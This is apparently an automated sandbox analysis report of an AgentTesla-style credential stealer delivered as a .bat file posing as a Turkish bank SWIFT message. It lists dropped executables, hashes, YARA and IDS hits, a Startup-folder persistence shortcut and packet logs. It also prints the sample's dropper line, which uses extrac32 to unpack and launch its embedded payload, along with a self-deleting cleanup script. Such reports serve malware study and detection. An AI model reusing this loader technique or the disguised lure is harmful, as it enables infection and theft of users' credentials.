File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubcsyjx4.jfl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\neworigin.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	250368
Entropy (8bit):	5.008874766930935
Encrypted:	false
SSDEEP:	3072:K5rmOKmqOPQrF5Z6YzyV29z556CWZxtm:KBmOKmqOPQrF/6YP9zZWjt
MD5:	D6A4CF0966D24C1EA836BA9A899751E5
SHA1:	392D68C000137B8039155DF6BB331D643909E7E7
SHA-256:	DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
SHA-512:	9FA7AA65B4A0414596D8FD3E7D75A09740A5A6C3DB8262F00CB66CD4C8B43D17658C42179422AE0127913DEB854DB7ED02621D0EEB8DDFF1FAC221A8E0D1CA35
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\server_BTC.exe

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	164
Entropy (8bit):	5.01536063413633
Encrypted:	false
SSDEEP:	3:mKDDCMNvFbuov3DCHyg4E2J5xAIJWAdEFKDwU1hGDCHyg4E2J5xAInTRI5bRoyI9:hWKdbuoLCHhJ23fJWAawDNeCHhJ23fTZ
MD5:	E5D94F5D240B2F5811254BEF4DE245B3
SHA1:	538E28FA95D5787191F9F1DEA7998ED0B5923D2F
SHA-256:	6528C3BBDC1FA7D06FF4DE1069866724ACA17A3E26827ACD9F91B668E756B346
SHA-512:	29B8E63AF5CE4BB55BA6CA5F5CEA810BC1C567E641577BBEED179FDA55F6943FE37328C3AFCB20D6712B55219D17DD09E7F80FDCCC74987E225E7B4710775283
Malicious:	false
Preview:	@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp692E.tmp.cmd" /f /q..

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1056768
Entropy (8bit):	6.917170198806807
Encrypted:	false
SSDEEP:	24576:/GBqWzMJ3rInJFhR1T6a3R6ZFlR+gKT44VoIOL7zk:/CHnca8YL6L
MD5:	BDC3B662D1136F20F51F55A0F6A2FB9D
SHA1:	EF8BAAD4F0F3F96E2D04F3C6CEA1471BCD651008
SHA-256:	23B47A050614D71D7081F8E0313C972E9E6B1DF6C9EEC10F59B6EE06D0506EC9
SHA-512:	29036CED934C7668B072C811285761A2B4CDD562B2D269E50BE767E8BE27589117E84BF0F34B0323912A3DEA4545DAB9B9E5A6046C8BEB36D15EF65056A88AD8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................:......\.............@..............................................@...........................`...%... ..........................Tj...................................................f...............................text............................... ..`.itext.............................. ..`.data...H...........................@....bss.....6... ...........................idata...%...`...&..................@....tls....4...............................rdata...............*..............@..@.reloc..Tj.......l...,..............@..B.rsrc........ ......................@..@..................... ..............@..@................................................................................................

C:\Users\user\AppData\Roaming\924cae54405a0e31.bin

Download File

Process:	C:\Users\Public\Libraries\lxsyrsiW.pif
File Type:	data
Category:	dropped
Size (bytes):	12320
Entropy (8bit):	7.984293522539444
Encrypted:	false
SSDEEP:	384:sIHZNpCiwH2TT4B/rHTIsoy7VnBji5o9T:V5uHbFLTIsk6
MD5:	EBAD11B1BF6025C8D74B45C5A3DD7011
SHA1:	19B5585D25398E5774156168E7236241C0897D8F
SHA-256:	F21081BA6C12DD01E5FB7781CBBB084FF9DF4A2E009004E8E81B7274A08CA009
SHA-512:	0CEF2A0E54C14DFE71ECFE403ECDF1D0BEAB26076409AA44B4FFAF5346D870FF1BC430F6FF5957B50D8B2BF9A1C7B31A1B2257FA37AFE68090C0632192028077
Malicious:	false
Preview:	8K.z.}<5........0.f....3..?...w..?....S.2.@.l.V..B.....dS.......4H9.._..1f..)~..o..v.U?.....{.^-F5M{.;./Ek[F./.eh..5...Zb.S#{j...,...9]b(..>.?.)a....c.H.oz.kz.scU.....{......+5JE.O.......F@'O)..r...L..... ...>...."#c..'.tP..]....,.+..j...F........\...CB..\|".\\|pD.xq..4..<..]m.FT(J..[lq.../5.Y..... \|.....7....Bz....S....O...)D..........o...@sG.z...M.M...P.q..Z..De.!.5y."v...j...k..y.9....l.o]...~.0....v..h....".Q..?.q".C....'.m.o.-'_.Uj.6.g(..J..V.........>..i_9._.[.DE\|...P...K...Y......{l....\|.5...0.a$.qTh..s..-..Y...5..^$...Y..H8..7...R..K.w..........\|e..{.Tj...8pd"f/...I%.[F..}.....l..^..v.....1..,F.;.<.OI.fP....0n.T...}......Kc.....2.....bO..\|:E...MC.DvUoGC.;.....DA.1..$.p..l.O..).E$.R..."...).s.~-.m.i.Z.?,/.........@P..%$RJk....(.9L.$....N../@.dY.wO@".E....~.y%]9...........j.K..M........"6...y.,..3i..NN..+.3.LH.=I..6..3..._v......-...Ak.&....\.Jlip.d.39.6.s.q...>...=...M..(pF$...\|.../..4<....9.^m..k......K..A.8...'D..69C..ws\|

C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	231936
Entropy (8bit):	5.039764014369673
Encrypted:	false
SSDEEP:	3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
MD5:	50D015016F20DA0905FD5B37D7834823
SHA1:	6C39C84ACF3616A12AE179715A3369C4E3543541
SHA-256:	36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
SHA-512:	55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...\|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!......s3...z...s..........(.....Z~ ...oK...~....(!.....(5....&.(!.....".......".(u....Vs....(v...t.........&..(.....Br...p(.....(....sL....).......0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Nov 11 16:02:35 2024, mtime=Mon Nov 11 16:02:35 2024, atime=Mon Nov 11 16:02:32 2024, length=231936, window=
Category:	dropped
Size (bytes):	1794
Entropy (8bit):	3.508764686120447
Encrypted:	false
SSDEEP:	24:8bHz3zc+6eMk5UAGas4FSnclwO4ZTqlzK2m:8bHz3I+59Gb4+clwZTqlm2
MD5:	93425BE724A285D48B946D910C576490
SHA1:	B3E042FC280BD7CE465443410A697577CAF07600
SHA-256:	F05945FF18A99E0D6CC476A7593B30FC6F4265EFBD0AE9B77DEDE76E1A72E58C
SHA-512:	67108537C37615B1C0F9FBC98D79D41E8137C51B95B62EC028B00FEE1E60B3218921699427BA85056EF891D20DC03F98FACE8C8A233F329B09C2897031C06300
Malicious:	false
Preview:	L..................F.@.. ...D9D.[4..D9D.[4...z.[4............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....@.v[4....H.[4......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BkYK...........................d...A.p.p.D.a.t.a...B.V.1.....kYP...Roaming.@......EW)BkYP.............................#.R.o.a.m.i.n.g.....T.1.....kYR...ACCApi..>......kYR.kYR......)......................t.A.C.C.A.p.i.....l.2.....kYQ. .TROJAN~1.EXE..P......kYR.kYR......)....................:...T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........T.L......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	593
Entropy (8bit):	4.628389634375338
Encrypted:	false
SSDEEP:	12:qQ/xTzP1eSbZ7u0wxDDDDDDDDjCaY52oOaYAUoOTB8NGNY:X/xTzdp7u0wQak2oOaOoOt8N/
MD5:	D8B0A0FDC93BB619557ECFFC38C0ABDA
SHA1:	557FE7D2A3008C6D146098A15DD6839EE87862D1
SHA-256:	852F384651C1D8A80584BCFAE2B38379B1DFF9A164538E6F2C7C4C03E4F2F6C7
SHA-512:	6FFC475EB0349099F2BD1E32BF3F04CA73724F619C7087926B35041803C1EBECC4FA8872071CAC192360690B0DDC0A2F602AD1EC91BFE80FAE5EE589BE801675
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\AppData\Local\Temp\x.exe...Destination File: C:\\Users\\Public\\Libraries\\Wisrysxl.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x102000 (1056768) (1 MB)....Total bytes written = 0x102000 (1056768) (1 MB).......Operation completed successfully in 0.125 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	66
Entropy (8bit):	4.524640141725149
Encrypted:	false
SSDEEP:	3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
MD5:	04A92849F3C0EE6AC36734C600767EFA
SHA1:	C77B1FF27BC49AB80202109B35C38EE3548429BD
SHA-256:	28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
SHA-512:	6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
Malicious:	false
Preview:	..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

Static File Info

General

File type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 33 datablocks, 0 compression
Entropy (8bit):	6.916845207965399
TrID:	Microsoft Cabinet Archive (8008/1) 99.91% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
File name:	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat
File size:	1'057'171 bytes
MD5:	9096921da7521dd3a36a5fb35fc84fa9
SHA1:	bcf834c98de442f75b21e053c3b9d893aebb5b24
SHA256:	769f8dac244efda700b8d9e966a8b33c4b27aa8180d7898f9a829210076d3066
SHA512:	0ff8a592c16a8e01bc9165b10cdbadb9f70e7ff44547245f40456e4f293fbb3c3f87db63db39fd18874f182dcbd8d16333c6d2203dc242f805941375cf7d0805
SSDEEP:	24576:oGBOWvM13rIn9hVR1X6+3p6ZdllagKT8URocOL7zk:oC7n0+EYzaL
TLSH:	BE259E75F6784C66D03B65798CCE67AED82C7B782929B4C326F54B392A39284340FC53
File Content Preview:	MSCF............u.......................!.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe"..... ............ .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-11T18:02:28.043830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49706	198.252.105.91	443	TCP
2024-11-11T18:02:43.410691+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.8	49709	TCP
2024-11-11T18:03:21.873238+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.8	49721	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 11, 2024 18:02:27.100097895 CET	49705	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.100158930 CET	443	49705	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:27.100244999 CET	49705	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.103605986 CET	49705	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.103652954 CET	443	49705	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:27.103801012 CET	49705	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.366653919 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.366702080 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:27.366780996 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.396251917 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:27.396275997 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.043755054 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.043829918 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.056566000 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.056593895 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.056947947 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.105892897 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.177666903 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.223344088 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.308994055 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.359966040 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.359982014 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.389985085 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.389996052 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.390043020 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.390060902 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.390074968 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.390079021 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.390094995 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.390105963 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.390126944 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.390147924 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.391892910 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.391902924 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.391937017 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.391961098 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.391976118 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.391985893 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.392015934 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.392035007 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.471308947 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.471337080 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.471407890 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.471419096 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.471575975 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.472090960 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.472106934 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.472165108 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.472173929 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.472220898 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.472934008 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.472950935 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.473007917 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.473016024 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.473058939 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.474145889 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.474165916 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.474236012 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.474242926 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.474286079 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.861131907 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.861146927 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.861181974 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.861222029 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.861248016 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.861279964 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.861299992 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.862390995 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.862409115 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.862458944 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.862467051 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.862505913 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.862520933 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.863389969 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.863406897 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.863456964 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.863466024 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.863498926 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.863526106 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.864346981 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.864366055 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.864422083 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.864432096 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.864475012 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.865333080 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.865350962 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.865395069 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.865401983 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.865425110 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.865458965 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.866677046 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.866705894 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.866753101 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.866760969 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.866787910 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.866806030 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.867297888 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.867324114 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.867366076 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.867381096 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.867391109 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.867425919 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.868427038 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.868444920 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.868516922 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.868527889 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.868577003 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.868993998 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.869014025 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.869087934 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.869096994 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.869138002 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.869947910 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.869966030 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.870013952 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.870023012 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.870050907 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.870069027 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.870614052 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.870630980 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.870668888 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.870676041 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.870707035 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.870729923 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.871584892 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.871608973 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.871648073 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.871655941 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.871680021 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.871701002 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.872962952 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.872981071 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.873034000 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.873043060 CET	443	49706	198.252.105.91	192.168.2.8
Nov 11, 2024 18:02:28.873080969 CET	49706	443	192.168.2.8	198.252.105.91
Nov 11, 2024 18:02:28.873584986 CET	443	49706	198.252.105.91	192.168.2.8
